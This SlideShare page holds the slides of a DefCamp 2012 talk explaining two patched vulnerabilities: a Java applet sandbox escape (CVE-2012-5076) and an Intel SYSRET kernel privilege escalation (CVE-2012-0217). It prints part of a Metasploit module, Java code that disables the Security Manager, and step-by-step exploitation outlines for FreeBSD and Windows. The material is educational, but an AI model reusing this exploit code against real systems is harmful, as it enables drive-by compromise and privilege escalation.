SlideShare a Scribd company logo
D
                                       E
                                       F
                                       C
                                       A
How does a 0day work?                  M
                                       P

   Ionut Gabriel Popescu               2
                                       0
               “Nytro”
                                       1
    https://www.rstcenter.com/forum/   2
D
                           E
                           F
                Contents   C
                           A
                           M
1. Why?                    P
2. CVE-2012-5076
                           2
3. CVE-2012-0217           0
                           1
4. Questions?              2
D
                        Why                       E
                to learn how do 0days work?       F
                                                  C
                                                  A
- Not so many interested people
                                                  M
- A very interesting subject                      P
- Unlimited possibilities: Windows/Linux, Java…
                                                  2
- Highly technical skills                         0
                                                  1
- Deep understanding of “internals”
                                                  2
- Don’t be a script kiddie – Metasploit?
- Not so complicated at all
D
Java Applet JAX-WS Remote Code                         E
                                                       F
                 CVE-2012-5076
                                                       C
                                                       A
Disclosure: 16 Oct 2012                                M
Discovered by: Unknown                                 P
Oracle patch: October 2012
                                                       2
Exploited: November 2012                               0
Java: Version 7 update 7 (7u7)                         1
Fastly included by: BlackHole, Nuclear Pack, RedKit…   2
Metasploit module: juan vazquez
Also known as: Java drive-by
D
                                                                           E
      Browser Java applets can NOT:                                        F
                                                                           C
                                                                           A
    - Access filesystem
    - Access system clipboard                                              M
    - Transfer data from other server                                      P
    - Load native libraries
    - Change Security Manager                                              2
    - Create a Class Loader
                                                                           0
    - Read certain system Properties
                                                                           1
                                                                           2
Source:
- http://docs.oracle.com/javase/tutorial/deployment/applet/security.html
Exploit - Metasploit   D
                                   E
                                   F
                                   C
                                   A
                                   M
                                   P

                                   2
                                   0
                                   1
                                   2




Is this 1337?
##
# This file is part of the Metasploit Framework and may be subject to
                                                                                                     D
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
                                                                                                     E
# http://metasploit.com/
##
                                                                                                     F
require 'msf/core'
                                                                                                     C
require 'rex'                                                                                        A
class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
                                                                                                     M
  include Msf::Exploit::Remote::HttpServer::HTML
                                                                                                     P
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })                                                             2
    def initialize( info = {} )
        super( update_info( info,
                                                                                                     0
            'Name'
            'Description' => %q{
                                 => 'Java Applet JAX-WS Remote Code Execution',                      1
                    This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
                code outside of the sandbox as exploited in the wild in November of 2012. The
                                                                                                     2
                vulnerability affects Java version 7u7 and earlier.
            },
            'License'            => MSF_LICENSE,
            'Author'            =>
                [
                    'Unknown', # Vulnerability Discovery
                    'juan vazquez' # metasploit module
                ]
...................................................................................
D
                    Exploit source                                             E
                                                                               F
   paths = [
          [ "Exploit.class" ],                                                 C
          [ "MyPayload.class" ]                                                A
       ]                                                                       M
         p = regenerate_payload(cli)                                           P

         jar = p.encoded_jar                                                   2
                                                                               0
Links:                                                                         1
 - https://metasploit.com/svn/framework3/trunk/external/source/exploits/cve-   2
 2012-5076/Exploit.java
 - https://metasploit.com/svn/framework3/trunk/external/source/exploits/cve-
 2012-5076/MyPayload.java
D
                                    Cool parts                                                       E
 import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory;                                     F
 import com.sun.org.glassfish.gmbal.util.GenericConstructor;
                                                                                                     C
 GenericConstructor genericconstructor = new GenericConstructor(Object.class,                        A
 "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
         Object obj = genericconstructor.create(new Object[] {});                                    M
                                          Method method =
 ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class });   P
         Class class1 = (Class)method.invoke(obj, new Object[] {
             //byte_payload
             buffer
         });                                                                                         2
         class1.newInstance();
         //System.out.println("SecurityManager:" + System.getSecurityManager());                     0
         //class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);
         Payload.main(null);                                                                         1
         //Runtime.getRuntime().exec("calc.exe");
                                                                                                     2
 public MyPayload()
 {
            AccessController.doPrivileged(this);
}

public Object run() throws Exception
 {
           System.setSecurityManager(null);
           return null;
}
Classes and methods                   D
                                                   E
                                                   F
- GenericConstructor                               C
- GenericConstructor.create                        A
- sun.invoke.anon.AnonymousClassLoader             M
- sun.invoke.anon.AnonymousClassLoader.loadClass   P
- ManagedObjectManagerFactory
- ManagedObjectManagerFactory.getMethod            2
- Method                                           0
- Method.invoke                                    1
- Class                                            2
- Class.newInstance
- Payload.main(null);
D
           How does this 0day work?                                      E
                                                                         F
0. Abuse of “GenericConstructor” and “ManagedObjectManagerFactory”
                                                                         C
  - “GenericConstructor” and “ManagedObjectManagerFactory” – bypass
  Java security model                                                    A
                                                                         M
1. Create an instance of “sun.invoke.anon.AnonymousClassLoader”
                                                                         P
  - “sun.invoke.anon.AnonymousClassLoader” – Restricted, privileged

2. Call “loadClass” method from “sun.invoke.anon.AnonymousClassLoader”   2
  - “loadClass” – Loads a byte[] stream class                            0
                                                                         1
3. Call the default constructor of our class, loaded using
“AnonymousClassLoader”                                                   2
 - Since it is called from a privileged code, it will run privileged,
 disable Security Manager
4. Enjoy
 - Do whatever you want
D
             E
             F
             C
             A
             M
             P
Questions?   2
             0
             1
             2
D
   Intel SYSRET privilege escalation       E
                  CVE-2012-0217            F
                                           C
Discovered by: Rafal Wojtczuk              A
Disclosed: 12 April 2012                   M
Patched: 12 June 2012                      P
Affected operating systems:
      - FreeBSD
                                           2
      - Windows 7                          0
      - Linux (NO - CVE-2006-0744 - DOS)   1
Just 64 bit systems are vulnerable         2
Complicated, tricky
Only Intel x64 processors
D
                     Intro x64                                     E
                                                                   F
Registers extended to 64 bits: RAX, RBX… RIP, RSP                  C
    - AH/L = 1B, AX = 2 bytes, EAX = 4 bytes, RAX = 8 bytes        A
                                                                   M
New general purpose registers:
                                                                   P
    - R8, R9, R10, R11, R12, R13, R14, R15

New calling convention:                                            2
    - RCX – 1st argument                                           0
    - RDX – 2nd argument                                           1
    - R8 – 3rd argument
    - R9 – 4th argument                                            2
    Still requires stack to be reserved

Windows x64 replaced fs with gs – TIB (Thread Information Block)
D
                            Why?                                       E
                                                                       F
- Because of “sysret” instruction                                      C
- Older system calls – very slow: Interrupts (Ex. int 0x80)            A
- Interrupts need to use IDT (Interrupt Dispatch Table)                M
- AMD: syscall/sysret, Intel: sysenter/sysexit (saves RIP in RCX)      P
- Intel follows AMD 64 standard (not exactly)
- Just 48 bits are used (not all 64) = 256 TB of memory available      2
- Must use canonical addresses (bits 48-63 == 47)                      0
- A #GP (General Protection) is raised for non-canonical RIP           1
- On exception, exception record is pushed on the stack: error code,   2
Saved: RIP, CS, RFLAGS, RSP, SS
- Usermode stack is changed to kernel mode stack – “safe” one
- If RSP is invalid, #DF (double fault) is raised
D
                            Privileges                                           E
                                                                                 F
                                                                                 C
                                                                                 A
- Main purpose: full privileges (no limitations)
                                                                                 M
- Rings: 0, 1, 2, 3 – Because segment descriptor DPL == 2 bits
                                                                                 P
- Windows and Linux uses just 0 and 3 (compatibility)
- Low privilege to high privilege: system calls                                  2
- Change from usermode to kernel mode with syscall and reverse:                  0
    1. RIP is in usermode, RSP is in usermode, syscall                           1
    2. RIP - kernel mode, RSP - usermode (replaced during system call), sysret   2
D
                                                                        E
         How does this 0day work?                                       F
                                                                        C
- What can happen during sysret: interrupts, exceptions                 A
- Interrupts are not blocked, but are forbidden (one MSR)
                                                                        M
- How about exceptions? #GP
                                                                        P
- On AMD, #GP is not raised for non-canonical address in RCX (safe)
                                                                        2
- On Intel, if we can have RIP (depends on OS how) to a non-canonical
address before sysret, #GP will be raised                               0
- #GP is raised while CPU is in privileged mode                         1
- Use RSP to overwrite kernel structure to execute code with ring0      2
privileges
Operating system specific                                                              D
                                                                                                  E
FreeBSD:                                                                                          F
 1. Place a “syscall” (0x0f, 0x05) right before a non-canonical address ((1 << 47) - 2)
                                                                                                  C
 2. Set RSP to a calculated value to make sure the exception record pushed on stack will          A
 overwrite #PF (Page Fault)’s “target” offset (raised) with a pointer to our kernelmode payload   M
 3. #PF will be raised (because gs is usermode) and will execute our payload
                                                                                                  P
 4. Recover overwritten IDTs to avoid a triple fault (machine reboot)

                                                                                                  2
Windows:
                                                                                                  0
 1. Create an UMS scheduled thread (EnterUmsSchedulingMode)
                                                                                                  1
 2. Set RIP and RSP from TEB (Thread Environmet Block) to a non-canonical address
 3. Create a new thread that will continuously overwrite return address from #GP stack after it
                                                                                                  2
 writes it but before it is read (after function call)


Enjoy!
D
             E
             F
             C
             A
             M
             P
Questions?   2
             0
             1
             2

More Related Content

Similar to How does a 0day work? - DefCamp 2012

Android Developer Meetup
Android Developer MeetupAndroid Developer Meetup
Android Developer Meetup
Medialets
 
How to Learn Java Programming
How to Learn Java ProgrammingHow to Learn Java Programming
How to Learn Java Programming
Java2Blog
 
Resume_ChuangCao
Resume_ChuangCaoResume_ChuangCao
Resume_ChuangCao
Chuang Cao
 
Kuldeep presentation ppt
Kuldeep presentation pptKuldeep presentation ppt
Kuldeep presentation ppt
kuldeep khichar
 
DTrace and Drupal
DTrace and DrupalDTrace and Drupal
DTrace and Drupal
Angelo Rajadurai
 
Metasploit
MetasploitMetasploit
Metasploit
penetration Tester
 
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitianPoc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
Liang Chen
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms
Rod Soto
 
Lambda: A Peek Under The Hood - Brian Goetz
Lambda: A Peek Under The Hood - Brian GoetzLambda: A Peek Under The Hood - Brian Goetz
Lambda: A Peek Under The Hood - Brian Goetz
JAX London
 
High Availability from the DevOps side - OpenStack Summit Portland
High Availability from the DevOps side - OpenStack Summit PortlandHigh Availability from the DevOps side - OpenStack Summit Portland
High Availability from the DevOps side - OpenStack Summit Portland
eNovance
 
Advanced Persistent Threats: Reality or Myth
Advanced Persistent Threats: Reality or MythAdvanced Persistent Threats: Reality or Myth
Advanced Persistent Threats: Reality or Myth
Rahul Mohandas
 
maven-for-maine-jug-090226091601-phpapp02.ppt
maven-for-maine-jug-090226091601-phpapp02.pptmaven-for-maine-jug-090226091601-phpapp02.ppt
maven-for-maine-jug-090226091601-phpapp02.ppt
nikhilmahendranath1
 
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tipsDEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
Felipe Prado
 
Java 9 Module System
Java 9 Module SystemJava 9 Module System
Java 9 Module System
Hasan Ünal
 
A JCR view of the world: everything is content, everything is a tree
A JCR view of the world: everything is content, everything is a treeA JCR view of the world: everything is content, everything is a tree
A JCR view of the world: everything is content, everything is a tree
Bertrand Delacretaz
 
A JCR view of the world: everything is content, everything is a tree!
A JCR view of the world: everything is content, everything is a tree!A JCR view of the world: everything is content, everything is a tree!
A JCR view of the world: everything is content, everything is a tree!
Bertrand Delacretaz
 
Behind the Scenes at LiveJournal: Scaling Storytime
Behind the Scenes at LiveJournal: Scaling StorytimeBehind the Scenes at LiveJournal: Scaling Storytime
Behind the Scenes at LiveJournal: Scaling Storytime
SergeyChernyshev
 
MoDisco EclipseCon2010
MoDisco EclipseCon2010MoDisco EclipseCon2010
MoDisco EclipseCon2010
fmadiot
 
Log4Shell - Armageddon or Opportunity.pptx
Log4Shell - Armageddon or Opportunity.pptxLog4Shell - Armageddon or Opportunity.pptx
Log4Shell - Armageddon or Opportunity.pptx
Steve Poole
 
eZ Publish 5 in depth inspection
eZ Publish 5 in depth inspectioneZ Publish 5 in depth inspection
eZ Publish 5 in depth inspection
Jérôme Vieilledent
 

Similar to How does a 0day work? - DefCamp 2012 (20)

Android Developer Meetup
Android Developer MeetupAndroid Developer Meetup
Android Developer Meetup
 
How to Learn Java Programming
How to Learn Java ProgrammingHow to Learn Java Programming
How to Learn Java Programming
 
Resume_ChuangCao
Resume_ChuangCaoResume_ChuangCao
Resume_ChuangCao
 
Kuldeep presentation ppt
Kuldeep presentation pptKuldeep presentation ppt
Kuldeep presentation ppt
 
DTrace and Drupal
DTrace and DrupalDTrace and Drupal
DTrace and Drupal
 
Metasploit
MetasploitMetasploit
Metasploit
 
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitianPoc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
Poc2015 os x_kernel_is_as_strong_as_its_weakest_part_liang_shuaitian
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms
 
Lambda: A Peek Under The Hood - Brian Goetz
Lambda: A Peek Under The Hood - Brian GoetzLambda: A Peek Under The Hood - Brian Goetz
Lambda: A Peek Under The Hood - Brian Goetz
 
High Availability from the DevOps side - OpenStack Summit Portland
High Availability from the DevOps side - OpenStack Summit PortlandHigh Availability from the DevOps side - OpenStack Summit Portland
High Availability from the DevOps side - OpenStack Summit Portland
 
Advanced Persistent Threats: Reality or Myth
Advanced Persistent Threats: Reality or MythAdvanced Persistent Threats: Reality or Myth
Advanced Persistent Threats: Reality or Myth
 
maven-for-maine-jug-090226091601-phpapp02.ppt
maven-for-maine-jug-090226091601-phpapp02.pptmaven-for-maine-jug-090226091601-phpapp02.ppt
maven-for-maine-jug-090226091601-phpapp02.ppt
 
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tipsDEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
 
Java 9 Module System
Java 9 Module SystemJava 9 Module System
Java 9 Module System
 
A JCR view of the world: everything is content, everything is a tree
A JCR view of the world: everything is content, everything is a treeA JCR view of the world: everything is content, everything is a tree
A JCR view of the world: everything is content, everything is a tree
 
A JCR view of the world: everything is content, everything is a tree!
A JCR view of the world: everything is content, everything is a tree!A JCR view of the world: everything is content, everything is a tree!
A JCR view of the world: everything is content, everything is a tree!
 
Behind the Scenes at LiveJournal: Scaling Storytime
Behind the Scenes at LiveJournal: Scaling StorytimeBehind the Scenes at LiveJournal: Scaling Storytime
Behind the Scenes at LiveJournal: Scaling Storytime
 
MoDisco EclipseCon2010
MoDisco EclipseCon2010MoDisco EclipseCon2010
MoDisco EclipseCon2010
 
Log4Shell - Armageddon or Opportunity.pptx
Log4Shell - Armageddon or Opportunity.pptxLog4Shell - Armageddon or Opportunity.pptx
Log4Shell - Armageddon or Opportunity.pptx
 
eZ Publish 5 in depth inspection
eZ Publish 5 in depth inspectioneZ Publish 5 in depth inspection
eZ Publish 5 in depth inspection
 

More from DefCamp

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht Hacking
DefCamp
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
DefCamp
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of Trust
DefCamp
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?
DefCamp
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UX
DefCamp
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...
DefCamp
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the Attacker
DefCamp
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)
DefCamp
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFA
DefCamp
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical Application
DefCamp
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money down
DefCamp
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...
DefCamp
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epoch
DefCamp
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcare
DefCamp
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?
DefCamp
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured
DefCamp
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
DefCamp
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.
DefCamp
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber Security
DefCamp
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering hole
DefCamp
 

More from DefCamp (20)

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht Hacking
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of Trust
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UX
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the Attacker
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFA
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical Application
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money down
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epoch
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcare
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber Security
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering hole
 

How does a 0day work? - DefCamp 2012

  • 1. D E F C A How does a 0day work? M P Ionut Gabriel Popescu 2 0 “Nytro” 1 https://www.rstcenter.com/forum/ 2
  • 2. D E F Contents C A M 1. Why? P 2. CVE-2012-5076 2 3. CVE-2012-0217 0 1 4. Questions? 2
  • 3. D Why E to learn how do 0days work? F C A - Not so many interested people M - A very interesting subject P - Unlimited possibilities: Windows/Linux, Java… 2 - Highly technical skills 0 1 - Deep understanding of “internals” 2 - Don’t be a script kiddie – Metasploit? - Not so complicated at all
  • 4. D Java Applet JAX-WS Remote Code E F CVE-2012-5076 C A Disclosure: 16 Oct 2012 M Discovered by: Unknown P Oracle patch: October 2012 2 Exploited: November 2012 0 Java: Version 7 update 7 (7u7) 1 Fastly included by: BlackHole, Nuclear Pack, RedKit… 2 Metasploit module: juan vazquez Also known as: Java drive-by
  • 5. D E Browser Java applets can NOT: F C A - Access filesystem - Access system clipboard M - Transfer data from other server P - Load native libraries - Change Security Manager 2 - Create a Class Loader 0 - Read certain system Properties 1 2 Source: - http://docs.oracle.com/javase/tutorial/deployment/applet/security.html
  • 6. Exploit - Metasploit D E F C A M P 2 0 1 2 Is this 1337?
  • 7. ## # This file is part of the Metasploit Framework and may be subject to D # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. E # http://metasploit.com/ ## F require 'msf/core' C require 'rex' A class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking M include Msf::Exploit::Remote::HttpServer::HTML P include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) 2 def initialize( info = {} ) super( update_info( info, 0 'Name' 'Description' => %q{ => 'Java Applet JAX-WS Remote Code Execution', 1 This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The 2 vulnerability affects Java version 7u7 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability Discovery 'juan vazquez' # metasploit module ] ...................................................................................
  • 8. D Exploit source E F paths = [ [ "Exploit.class" ], C [ "MyPayload.class" ] A ] M p = regenerate_payload(cli) P jar = p.encoded_jar 2 0 Links: 1 - https://metasploit.com/svn/framework3/trunk/external/source/exploits/cve- 2 2012-5076/Exploit.java - https://metasploit.com/svn/framework3/trunk/external/source/exploits/cve- 2012-5076/MyPayload.java
  • 9. D Cool parts E import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory; F import com.sun.org.glassfish.gmbal.util.GenericConstructor; C GenericConstructor genericconstructor = new GenericConstructor(Object.class, A "sun.invoke.anon.AnonymousClassLoader", new Class[0]); Object obj = genericconstructor.create(new Object[] {}); M Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class }); P Class class1 = (Class)method.invoke(obj, new Object[] { //byte_payload buffer }); 2 class1.newInstance(); //System.out.println("SecurityManager:" + System.getSecurityManager()); 0 //class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]); Payload.main(null); 1 //Runtime.getRuntime().exec("calc.exe"); 2 public MyPayload() { AccessController.doPrivileged(this); } public Object run() throws Exception { System.setSecurityManager(null); return null; }
  • 10. Classes and methods D E F - GenericConstructor C - GenericConstructor.create A - sun.invoke.anon.AnonymousClassLoader M - sun.invoke.anon.AnonymousClassLoader.loadClass P - ManagedObjectManagerFactory - ManagedObjectManagerFactory.getMethod 2 - Method 0 - Method.invoke 1 - Class 2 - Class.newInstance - Payload.main(null);
  • 11. D How does this 0day work? E F 0. Abuse of “GenericConstructor” and “ManagedObjectManagerFactory” C - “GenericConstructor” and “ManagedObjectManagerFactory” – bypass Java security model A M 1. Create an instance of “sun.invoke.anon.AnonymousClassLoader” P - “sun.invoke.anon.AnonymousClassLoader” – Restricted, privileged 2. Call “loadClass” method from “sun.invoke.anon.AnonymousClassLoader” 2 - “loadClass” – Loads a byte[] stream class 0 1 3. Call the default constructor of our class, loaded using “AnonymousClassLoader” 2 - Since it is called from a privileged code, it will run privileged, disable Security Manager 4. Enjoy - Do whatever you want
  • 12. D E F C A M P Questions? 2 0 1 2
  • 13. D Intel SYSRET privilege escalation E CVE-2012-0217 F C Discovered by: Rafal Wojtczuk A Disclosed: 12 April 2012 M Patched: 12 June 2012 P Affected operating systems: - FreeBSD 2 - Windows 7 0 - Linux (NO - CVE-2006-0744 - DOS) 1 Just 64 bit systems are vulnerable 2 Complicated, tricky Only Intel x64 processors
  • 14. D Intro x64 E F Registers extended to 64 bits: RAX, RBX… RIP, RSP C - AH/L = 1B, AX = 2 bytes, EAX = 4 bytes, RAX = 8 bytes A M New general purpose registers: P - R8, R9, R10, R11, R12, R13, R14, R15 New calling convention: 2 - RCX – 1st argument 0 - RDX – 2nd argument 1 - R8 – 3rd argument - R9 – 4th argument 2 Still requires stack to be reserved Windows x64 replaced fs with gs – TIB (Thread Information Block)
  • 15. D Why? E F - Because of “sysret” instruction C - Older system calls – very slow: Interrupts (Ex. int 0x80) A - Interrupts need to use IDT (Interrupt Dispatch Table) M - AMD: syscall/sysret, Intel: sysenter/sysexit (saves RIP in RCX) P - Intel follows AMD 64 standard (not exactly) - Just 48 bits are used (not all 64) = 256 TB of memory available 2 - Must use canonical addresses (bits 48-63 == 47) 0 - A #GP (General Protection) is raised for non-canonical RIP 1 - On exception, exception record is pushed on the stack: error code, 2 Saved: RIP, CS, RFLAGS, RSP, SS - Usermode stack is changed to kernel mode stack – “safe” one - If RSP is invalid, #DF (double fault) is raised
  • 16. D Privileges E F C A - Main purpose: full privileges (no limitations) M - Rings: 0, 1, 2, 3 – Because segment descriptor DPL == 2 bits P - Windows and Linux uses just 0 and 3 (compatibility) - Low privilege to high privilege: system calls 2 - Change from usermode to kernel mode with syscall and reverse: 0 1. RIP is in usermode, RSP is in usermode, syscall 1 2. RIP - kernel mode, RSP - usermode (replaced during system call), sysret 2
  • 17. D E How does this 0day work? F C - What can happen during sysret: interrupts, exceptions A - Interrupts are not blocked, but are forbidden (one MSR) M - How about exceptions? #GP P - On AMD, #GP is not raised for non-canonical address in RCX (safe) 2 - On Intel, if we can have RIP (depends on OS how) to a non-canonical address before sysret, #GP will be raised 0 - #GP is raised while CPU is in privileged mode 1 - Use RSP to overwrite kernel structure to execute code with ring0 2 privileges
  • 18. Operating system specific D E FreeBSD: F 1. Place a “syscall” (0x0f, 0x05) right before a non-canonical address ((1 << 47) - 2) C 2. Set RSP to a calculated value to make sure the exception record pushed on stack will A overwrite #PF (Page Fault)’s “target” offset (raised) with a pointer to our kernelmode payload M 3. #PF will be raised (because gs is usermode) and will execute our payload P 4. Recover overwritten IDTs to avoid a triple fault (machine reboot) 2 Windows: 0 1. Create an UMS scheduled thread (EnterUmsSchedulingMode) 1 2. Set RIP and RSP from TEB (Thread Environmet Block) to a non-canonical address 3. Create a new thread that will continuously overwrite return address from #GP stack after it 2 writes it but before it is read (after function call) Enjoy!
  • 19. D E F C A M P Questions? 2 0 1 2